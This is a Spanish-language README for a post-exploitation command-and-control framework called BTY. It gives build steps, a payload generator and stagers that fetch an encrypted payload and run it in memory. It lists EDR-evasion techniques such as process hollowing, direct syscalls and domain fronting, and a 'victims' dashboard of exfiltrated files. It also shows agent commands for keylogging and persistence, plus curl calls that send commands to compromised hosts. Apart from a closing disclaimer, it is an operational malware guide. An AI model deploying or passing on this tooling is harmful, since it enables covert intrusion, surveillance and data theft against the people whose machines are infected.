Post-exploitation command & control framework for red team operations and security research.
ruby570bocadito © 2026 — MIT License
# Dependencias
sudo apt install -y golang-go python3 curl git
# Clonar
git clone https://github.com/ruby570bocadito/bty && cd BTY
# Compilar (Go 1.23+)
cd src/go
CGO_ENABLED=0 go build -ldflags="-s -w" -o ../../bty-server ./cmd/server/main.go
CGO_ENABLED=0 go build -ldflags="-s -w" -o ../../bty-agent ./cmd/agent/main.go
cd ../..python3 scripts/deploy.pyAuto-detecta IP → genera config.yaml → arranca 4 listeners:
| Puerto | Protocolo | Uso |
|---|---|---|
| 8443 | TCP + TLS | Agentes |
| 8445 | HTTP | Long-polling |
| 8446 | WebSocket | Tiempo real |
| 9090 | HTTP | API REST + Dashboard |
Local IP: 192.168.1.100
Dashboard: http://192.168.1.100:9090
Login: admin / admin
# Menú interactivo (IP auto-detectada)
python3 scripts/payload.py
# Directo
python3 scripts/payload.py --os windows
python3 scripts/payload.py --os all
python3 scripts/payload.py --os all --server 10.0.0.5:8443| Formato | Target | Tamaño |
|---|---|---|
| EXE (Go) | Windows x64 | 6.5 MB |
| ELF (Go) | Linux x64 | 6.4 MB |
| Mach-O (Go) | macOS x64/ARM | 6.0-6.5 MB |
| PowerShell | Windows | 408 B |
| Python | Any | 308 B |
| C source | Compile | 23 KB |
Los payloads precompilados están en dist/.
| # | Técnica | Efecto |
|---|---|---|
| 1 | Process Hollowing | Payload corre dentro de svchost.exe (firmado Microsoft) |
| 2 | Syscalls Directos | Bypass hooks ntdll.dll — EDR no ve las llamadas |
| 3 | Shellcode Stager C | 2KB sin PE header, PEB API resolver, XOR decrypt |
| 4 | TLS + Domain Fronting | Tráfico C2 parece HTTPS a cdn.cloudflare.com |
| 5 | Sleep Obfuscation | Heap/stack encriptado durante idle |
| 6 | Traffic Shaper | Patrones imitan navegación humana |
| 7 | ObscuredString | Strings sensibles XOR-encrypted en binario |
| 8 | Anti-sandbox | Delay 30s + uptime check |
| 9 | Jitter | Heartbeat 25-45s aleatorio, reconnect ±30% |
# Stagers XOR-encrypted (PS1, Python, Bash)
python3 scripts/stager.py
# Ultra-stagers que no activan Defender (VBS, certutil, BITSAdmin)
python3 scripts/ultra-stager.pyEl stager (366 bytes VBS / 106 bytes certutil) descarga el payload cifrado, lo descifra en memoria, y ejecuta sin tocar disco.
1. python3 scripts/payload.py --os all --evasive
2. cd payloads/ && python3 -m http.server 8000
3. En Windows → wscript stager.vbs
4. Stager descarga + descifra + ejecuta en RAM
5. Cero detección estática, cero toques a disco
http://TU_IP:9090 → admin / admin
- Tabla de víctimas expandible (click → detalle + historial)
- Caja de comandos fija abajo con selector de víctima
- OS distribution, estadísticas, quick command
- File browser para datos exfiltrados
- Tema blanco minimalista profesional
python3 scripts/console.pybty > sessions
+------+------------------+------+-------+----+-------+
| ID | Hostname | User | OS | St | Tasks |
+------+------------------+------+-------+----+-------+
| abc | DESKTOP-I1RVLF3 | rby | linux | ● | 5 |
+------+------------------+------+-------+----+-------+
bty > interact abc
[abc] rby@DESKTOP-I1RVLF3 > whoami
rby
[abc] rby@DESKTOP-I1RVLF3 > sysinfo
Hostname: DESKTOP-I1RVLF3 ...
[abc] rby@DESKTOP-I1RVLF3 > background
bty >
Comandos: sessions, interact, shell, broadcast, vault, files, health, help
curl -u admin:admin http://IP:9090/api/sessions
curl -u admin:admin -X POST .../api/cmd -d '{"agent_id":"ID","command":"whoami"}'
curl -u admin:admin -X POST .../api/broadcast -d '{"command":"id"}'| Método | Ruta | Descripción |
|---|---|---|
| GET | /api/health |
Estado |
| GET | /api/sessions |
Víctimas |
| GET | /api/sessions/:id |
Detalle + tareas |
| DELETE | /api/sessions/:id |
Kill |
| POST | /api/cmd |
Ejecutar comando |
| POST | /api/broadcast |
Broadcast |
| POST | /api/socks |
SOCKS5 proxy |
| POST | /api/portfwd |
Port forward |
| POST | /api/vault |
Guardar credencial |
| GET | /api/vault?q=X |
Buscar |
| POST | /api/files |
Upload |
| GET | /api/files |
Listar |
Envía estos comandos por API o consola:
| Comando | Función |
|---|---|
sysinfo |
Info completa del sistema |
ps |
Procesos (ps aux / tasklist) |
netinfo |
Red (ifconfig + netstat) |
persistence |
Persistencia (crontab, registry, launchagent) |
screenshot |
Captura de pantalla |
keylogger |
Keylogger (Linux: /dev/input) |
find:*.txt |
Buscar archivos |
modules |
Listar módulos |
BTY/
├── bty-server ← C2 server (13 MB)
├── bty-agent ← agente (6.4 MB)
├── config.yaml
├── README.md
├── LICENSE
│
├── src/
│ ├── go/ ← fuente Go (5888 LOC)
│ │ ├── cmd/{server,agent}/
│ │ └── internal/
│ │ ├── crypto/ ← X25519 + XChaCha20-Poly1305 + HKDF
│ │ ├── c2/ ← server, session FSM, tunnel, operations
│ │ ├── agent/ ← agente: reconnect, exec, modules
│ │ ├── evasion/ ← hollowing, syscalls, sleepmask, camouflage
│ │ ├── db/ ← SQLite pure-Go
│ │ ├── config/ ← YAML loader
│ │ ├── transport/ ← TCP, HTTP, WS, DNS
│ │ └── socks/ ← SOCKS5 RFC 1928
│ ├── agents/{c,ps,py}/ ← agentes C, PS1, Python
│ └── modules/ ← módulos legacy Python
│
├── web/ ← Vue 3 SPA dashboard
│ ├── src/views/ ← Login, Sessions, Files, Dashboard
│ └── dist/ ← compilado (97 KB)
│
├── scripts/
│ ├── deploy.py ← despliegue C2
│ ├── payload.py ← generador payloads
│ ├── stager.py ← stagers evasivos
│ ├── ultra-stager.py ← VBS, certutil, BITSAdmin
│ └── console.py ← CLI interactiva
│
├── dist/ ← binarios precompilados
│ ├── bty-agent-linux (6.4 MB)
│ ├── bty-agent-windows.exe (6.5 MB)
│ ├── bty-agent-darwin-amd64 (6.5 MB)
│ └── bty-agent-darwin-arm64 (6.0 MB)
│
├── payloads/ ← payloads generados
└── data/ ← runtime (DB, loot)
MIT — Copyright (c) 2026 ruby570bocadito
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
Disclaimer: This tool is intended exclusively for authorized security testing on systems you own or have explicit permission to test.